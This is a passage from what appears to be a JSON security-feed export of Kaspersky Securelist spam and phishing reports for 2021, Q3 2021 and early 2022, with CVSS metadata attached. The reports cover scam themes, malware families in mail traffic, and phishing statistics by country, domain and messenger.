voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.\n\n[![Dynamics of phishing activity on WhatsApp in 2021 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[![Dynamics of phishing activity on Telegram in 2021 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[![Dynamics of phishing activity on Viber in 2021 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year's main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213750/securelist_spam_1-990x400.jpg)\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01-1024x711.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02-1024x452.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03-1024x490.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n"Nigerian prince" scammers also had a close eye on Q3's sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04-1024x429.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05-1024x613.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06-1024x351.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07-1024x661.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08-1024x323.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09-1024x455.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1-1024x672.jpeg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded on such platform. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which they removed the fraudulent apps.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11-1024x278.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12-1024x618.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13-1024x534.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14-1024x746.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15-1024x427.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16-1024x352.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17-1024x587.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[![Dynamics of phishing activity on WhatsApp, Q3 2021](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[![Dynamics of phishing activity on Telegram, Q3 2021](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/14165025/sl-email-spam-binary-code-data-abstract-1200-990x400.jpg)\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01-1024x546.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02-1024x427.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03-1024x413.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost closed. Vast selection of available seats should have alarmed visitors: real tickets would have been largely 